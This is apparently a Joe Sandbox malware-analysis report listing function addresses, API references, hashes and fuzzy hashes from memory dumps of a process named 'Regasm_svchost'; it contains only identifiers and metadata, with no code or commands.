Instruction ID: 5784ac860be46a501d9f786c6a3dc17208b32840cd45b054def8a1a80dd07d79
Opcode Fuzzy Hash: 1c193e90b7bb72683442c3742c8caef35aa51ad5dc42bb505f2c9895613c271c
Instruction Fuzzy Hash: E102DA34905328CFCB65DF24D98D6ADB7B2BF49305F2089EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D6F93 Relevance: 3.3, APIs: 2, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D6FB7
KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6cdd04dabdbfcb77de1dbddbbcbcce425216672dbd7303b8a3605a7b7b9d53b8
Instruction ID: a2d7be72e0517cfbdde3eb0c23098321905bca1b17143d66696c44002205c4c9
Opcode Fuzzy Hash: 6cdd04dabdbfcb77de1dbddbbcbcce425216672dbd7303b8a3605a7b7b9d53b8
Instruction Fuzzy Hash: 9D02DA34905328CFCB65DF24D98D6A9B7B2BF49305F2089EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D6FD8 Relevance: 1.8, APIs: 1, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8c1edecf4b1a6f554b27526b1640bfccfa1d6584517b083cf789ee9ec3703f6b
Instruction ID: d95456d87ee95e322aae9e936473f537cb5b4538527aa7d9e09c6f0209676bdc
Opcode Fuzzy Hash: 8c1edecf4b1a6f554b27526b1640bfccfa1d6584517b083cf789ee9ec3703f6b
Instruction Fuzzy Hash: 6302DA34905328CFCB66DF24D98D6A9B7B1BF49305F2089EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D701D Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f5c542e949507300dcd880e9b380d39cdffee7cb8fa3598fc1eb41b8e5b9e7b1
Instruction ID: a563037a2fef666e094ea22e769c909eed8479f20e66f47b116b3c3d60f03e4c
Opcode Fuzzy Hash: f5c542e949507300dcd880e9b380d39cdffee7cb8fa3598fc1eb41b8e5b9e7b1
Instruction Fuzzy Hash: 8EF1EA34905328CFCB65DF24D98D6A9B7B1BF49305F2089EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7062 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ab2d4682212d3afb9ac8530e8e6786daa308e393eeafd8420183a2cbcff4ec70
Instruction ID: 92dad0262a663f1e12742f3c3b21b55e0f17b705a29bcc46a3b5848b2041f091
Opcode Fuzzy Hash: ab2d4682212d3afb9ac8530e8e6786daa308e393eeafd8420183a2cbcff4ec70
Instruction Fuzzy Hash: A8F1EA34905328CFCB65DF24D98D6A9B7B1BF49305F2089EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D709E Relevance: 1.8, APIs: 1, Instructions: 305COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f86f4c99cfab7a88cd465ec9a32640d3081ba078b54f4230916f2c12a4ce5251
Instruction ID: cf272b823451fe7558ed84119f80db10672797407a87f22d417626edf12b7779
Opcode Fuzzy Hash: f86f4c99cfab7a88cd465ec9a32640d3081ba078b54f4230916f2c12a4ce5251
Instruction Fuzzy Hash: F7F1DA34905328CFCB65DF24D98D6ADB7B1BF49305F2089EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D70E3 Relevance: 1.8, APIs: 1, Instructions: 298COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0117bea8c3409ff639f8269b7afe3a825d4e7673c7b42ca913316e6ba386116c
Instruction ID: e7dd8172f15efe6ba7379a276c9847b9fe09e8553bea2a7292bcbc08a0dc6d50
Opcode Fuzzy Hash: 0117bea8c3409ff639f8269b7afe3a825d4e7673c7b42ca913316e6ba386116c
Instruction Fuzzy Hash: DEF1EA34905328CFCB66DF24D98D6ADB7B1BF49305F2089EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7128 Relevance: 1.8, APIs: 1, Instructions: 291COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 074806685162096119f766f6145d42f0673a3b1584744b40aeff9cc0f96868a4
Instruction ID: 80b81d5571dc8215eb68fff9633cecf28b5dfdd2ef41d363f02e6387868910f4
Opcode Fuzzy Hash: 074806685162096119f766f6145d42f0673a3b1584744b40aeff9cc0f96868a4
Instruction Fuzzy Hash: 3CE1DA34905228CFCB65DF24D98D6ADBBB1BF49305F2089EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D716D Relevance: 1.8, APIs: 1, Instructions: 284COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7bb1e6a7a5b7b4de3b96dfd19abcba42ea2ce13cde65cadbb3c4cc135c5246bd
Instruction ID: 318c86fd9835ec11a615dc40427357bd0493874f1490e7adef9a10b7f722f5a9
Opcode Fuzzy Hash: 7bb1e6a7a5b7b4de3b96dfd19abcba42ea2ce13cde65cadbb3c4cc135c5246bd
Instruction Fuzzy Hash: 27E1EA34905228CFCB65DF34D98D6ADBBB2BF49305F2049EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D71B2 Relevance: 1.8, APIs: 1, Instructions: 277COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 341abd72f7f364c3b6fe118d7681b4e12e1ad1f548ee86bf2d513f524b108e9e
Instruction ID: dc2573cef87e6e54a5ce0635a7dbae6f532a3da0981a94e96fbebafeaf136536
Opcode Fuzzy Hash: 341abd72f7f364c3b6fe118d7681b4e12e1ad1f548ee86bf2d513f524b108e9e
Instruction Fuzzy Hash: 21E1EA34905228CFCB65DF34D98D6ADBBB2BF49305F2049EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D71F7 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 247deb96b2934c93492e9bcb3497550f8056014d7aca43f967c15ac34072e346
Instruction ID: 4999860782a773d6046434ab12c6eaa876c685e80cdfea41f38f35c577c9a598
Opcode Fuzzy Hash: 247deb96b2934c93492e9bcb3497550f8056014d7aca43f967c15ac34072e346
Instruction Fuzzy Hash: 77D1EB34905228CFCB66DF34D98D6ADB7B1BF49305F2049EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7233 Relevance: 1.8, APIs: 1, Instructions: 263COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4d514cd7b4ee8af1c032c9807101ca7775f86a3225f1f140c050c2e67f0a656d
Instruction ID: 158598191e7891c2fabf5a61db87bef28de06aab7d2410e3b8de9905e428e57c
Opcode Fuzzy Hash: 4d514cd7b4ee8af1c032c9807101ca7775f86a3225f1f140c050c2e67f0a656d
Instruction Fuzzy Hash: B2D1FA34905228CFCB65DF34D98D6ADBBB2BF49305F2089EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7278 Relevance: 1.8, APIs: 1, Instructions: 256COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 039691d7c2992fb9dcc7f0d24d93ed49f9ce70df043ffdf85b55accc79579b7d
Instruction ID: 140ce330c8445b6bb73286005f3de38818c214ec6ae37ba2c25f24f9e3a3ccd7
Opcode Fuzzy Hash: 039691d7c2992fb9dcc7f0d24d93ed49f9ce70df043ffdf85b55accc79579b7d
Instruction Fuzzy Hash: 7ED1DA34905228CFCB65DF24D98D6ADBBB2BF49305F2049EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D72BD Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e1b0b9597eb37988b173fe9acfeedcf914b1891c2d9dae1604a1352522dd1688
Instruction ID: 5a7734b078a0c3dc0ab3a81075919081e93efa2983b302b8ab8c18be4f9134c2
Opcode Fuzzy Hash: e1b0b9597eb37988b173fe9acfeedcf914b1891c2d9dae1604a1352522dd1688
Instruction Fuzzy Hash: D2D1DA34905228CFCB65DF24D98D6A9BBB2BF49305F2085EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D72F9 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 593098e2455b1e42cd230e38b49b40e295f3c0db4757d56cd2ef3c4de01f2a18
Instruction ID: 1975fe5301b0142706f3ae0d92f12d7cc4aa472c77c5630a132c768cee6e7421
Opcode Fuzzy Hash: 593098e2455b1e42cd230e38b49b40e295f3c0db4757d56cd2ef3c4de01f2a18
Instruction Fuzzy Hash: 65C1C934905228CFCB66DF24D98D6ADBBB2BF49305F2085EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D733E Relevance: 1.7, APIs: 1, Instructions: 235COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a4f9c7bf28e4608214aaf6d96eddae1a13976dbc44963ccf09bba97755207763
Instruction ID: 6e27de274238ad450d54b2e89b41af94a12b12ede6ba1c98f6fb2ad40e785159
Opcode Fuzzy Hash: a4f9c7bf28e4608214aaf6d96eddae1a13976dbc44963ccf09bba97755207763
Instruction Fuzzy Hash: 1BC1EA34905228CFCB65DF24D98D6A9BBB2FF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7383 Relevance: 1.7, APIs: 1, Instructions: 228COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4e2d9448b7cc9a16d12ba0b3493686bad1743ebdb420bb4ee873b9d9d41a6033
Instruction ID: 435ecc47139f8cf520e115a549c460fbfd269ee8a26a5cfb7ea0c6dcf6c28d24
Opcode Fuzzy Hash: 4e2d9448b7cc9a16d12ba0b3493686bad1743ebdb420bb4ee873b9d9d41a6033
Instruction Fuzzy Hash: 81C1EA34905228CFCB65DF24D98D6A9BBB1FF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D73C8 Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: aa9f8cbe13ec15d8574c1de50f0a0299974d431b0adbd312059392d368ed35ec
Instruction ID: 0c2867f846adaf5a274e5fa95e0386708d823709b647630e104276bd11f60854
Opcode Fuzzy Hash: aa9f8cbe13ec15d8574c1de50f0a0299974d431b0adbd312059392d368ed35ec
Instruction Fuzzy Hash: A2B1C934905228CFCB66DF24D98D6A9BBB2FF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D740D Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7b9a913868628d7ca4117da919723620d29b370eccb6cd361e9e4cdce0ae7d43
Instruction ID: ea0b185902fc07b035ff770b4d373cb5ce5f4259229644d9beb12223c27ca42a
Opcode Fuzzy Hash: 7b9a913868628d7ca4117da919723620d29b370eccb6cd361e9e4cdce0ae7d43
Instruction Fuzzy Hash: 33B1C934905228CFCB66DF24D98D6A9BBB2FF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7452 Relevance: 1.7, APIs: 1, Instructions: 207COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a9525ab1149c7f6c857334e328d69aa6803fa65d43972ff40e51cc315b583f9e
Instruction ID: c2950232e21624f0681910b537125364b65c5da0476e5c1002b0a7c444a8537d
Opcode Fuzzy Hash: a9525ab1149c7f6c857334e328d69aa6803fa65d43972ff40e51cc315b583f9e
Instruction Fuzzy Hash: 28B1D834905228CFCB65DF34D98D6A9BBB2BF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7497 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b58228a420d6c80f56ad71cf301916fa50c5d53fb70a67960054e1f8e5ca512b
Instruction ID: c3e391d531635a9b37dbc132d9d6edeb4e47c393b6739c28441f68c4234f84e9
Opcode Fuzzy Hash: b58228a420d6c80f56ad71cf301916fa50c5d53fb70a67960054e1f8e5ca512b
Instruction Fuzzy Hash: 07A1E934905228CFCB65DF34D98D6A9B7B2BF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D74DC Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fbaaab0ed3b55cb592b0e1e8745624e5aaac8d11a3a35f2da9b7532573f19454
Instruction ID: 97216083a80039b26806af4923ba61c2946033de3427e2ad4e37439ae295799f
Opcode Fuzzy Hash: fbaaab0ed3b55cb592b0e1e8745624e5aaac8d11a3a35f2da9b7532573f19454
Instruction Fuzzy Hash: 06A1E934905228CFCB65DF34D98D6A9B7B2BF49305F2089EAD40AA7760DB316E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7518 Relevance: 1.7, APIs: 1, Instructions: 186COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f66bd5d81a9257dc6449c9dfcc75f13b7871b492750a55415075ac0583f21458
Instruction ID: 6e96966defca31e70e80c40a7e92b188109aa73939e010df18ecbea1b1ed87b3
Opcode Fuzzy Hash: f66bd5d81a9257dc6449c9dfcc75f13b7871b492750a55415075ac0583f21458
Instruction Fuzzy Hash: 56A1E938905228CFCB65DF34D98D6A9B7B1BF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D755D Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7cb6bd86fa544ee53757f147f0e4d78b69b965928e4161e54c81cafa151382f1
Instruction ID: 1f12c9d10ee18bba35b0c00c2215bb988529fdc6da7904f6ead2448bef9f962a
Opcode Fuzzy Hash: 7cb6bd86fa544ee53757f147f0e4d78b69b965928e4161e54c81cafa151382f1
Instruction Fuzzy Hash: A291FA38905228CFCB65DF34D98D6A9B7B1BF49305F2089EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7599 Relevance: 1.7, APIs: 1, Instructions: 170COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b335f7fd1cab044be4aed8a413f1f93f0d47452c6b53fb5e2613ff44ea0eaf0a
Instruction ID: 0fc11269ab1c1c12ed6e282be29faa0b0a86beeaf73ad888d07eeb8d72185bb1
Opcode Fuzzy Hash: b335f7fd1cab044be4aed8a413f1f93f0d47452c6b53fb5e2613ff44ea0eaf0a
Instruction Fuzzy Hash: 4B91EA38905228CFCB65DF34D98D6A9B7B1BF49305F2089EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D75D5 Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4a0c6c531d4226090c0459e2d4cac602eff5cb586d0e7f67c3a6ac0c4a64cf6a
Instruction ID: ee53687276e01f20bfd61c8e2c3ce770badad59f45e2ebf4fef747c8099f3cd4
Opcode Fuzzy Hash: 4a0c6c531d4226090c0459e2d4cac602eff5cb586d0e7f67c3a6ac0c4a64cf6a
Instruction Fuzzy Hash: DA81D738905228CFCB65DF34D98D6A9B7B1BF49305F2085EAD40AA7760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003DC408 Relevance: 1.6, APIs: 1, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 003DC521

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9e45cf6987b87bf87e6c256c56d883bacaafe49aac55ff4112c03966cc760c67
Instruction ID: bd858000001f737316a8f4b3dab3affd8ce8530102998f8c5d144dad3c986693
Opcode Fuzzy Hash: 9e45cf6987b87bf87e6c256c56d883bacaafe49aac55ff4112c03966cc760c67
Instruction Fuzzy Hash: E4416BB1D143499FCB11CFAAE494ADEBFF6AF49300F15806AE818AB351D7709905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D8FFC Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 003DC521

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c17b858ff0f25bc6e9afa118c1d6a2beb46b2f99661f3b27e2aff3ce43f4525f
Instruction ID: 89c04f0234144f87208f138448db7e419553fa5d3a706766a7fa6748ada8cb20
Opcode Fuzzy Hash: c17b858ff0f25bc6e9afa118c1d6a2beb46b2f99661f3b27e2aff3ce43f4525f
Instruction Fuzzy Hash: 7831F3B1D102199FCB21CF9AE484ADEFBF5BF49700F15842AE819AB350D770A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 006285C0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

fC=l, xrefs: 006287DA

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l
API String ID: 0-1664688535
Opcode ID: b9dca20d4118926e997c50d0a6623e958bee1ba4fa07c836ecaa22260474344c
Instruction ID: 6ba0e13db4bcf0fb6069ff1df4b10e3fa3228e366c25c5ec0d2bc0f171e5a603
Opcode Fuzzy Hash: b9dca20d4118926e997c50d0a6623e958bee1ba4fa07c836ecaa22260474344c
Instruction Fuzzy Hash: 1281B034B016148FDB04EBB4E9186AE76E3AFC9304F148439E50ADB794EF788C468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00628620 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

fC=l, xrefs: 006287DA

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l
API String ID: 0-1664688535
Opcode ID: 052a24b8cac7b38356406da0a69bc8a3b85e31c69a57284e37571bda92e62b5c
Instruction ID: af777ace02d1d6ef378f887e15f795c5fd18c0d191e3cc36b2c55e59df5a23c5
Opcode Fuzzy Hash: 052a24b8cac7b38356406da0a69bc8a3b85e31c69a57284e37571bda92e62b5c
Instruction Fuzzy Hash: 72719035B006158FCB44EBB8D9187AE76E3AFC8344F148439E90ADB794EF749C468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00628DF0 Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455c485276eba0f8d6853c246920e3e2b9fe1ac36be0edf65489bb9f18185106
Instruction ID: 7c15b51e1f98ea144e94efbc6848246ffde3c06a2a9acee6e06cb4bdbdb77ea9
Opcode Fuzzy Hash: 455c485276eba0f8d6853c246920e3e2b9fe1ac36be0edf65489bb9f18185106
Instruction Fuzzy Hash: 8732E430B002158FCB05EBB4E958AAE7BF2AF89304F148569E409DB796DF34DD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0062CED0 Relevance: .4, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
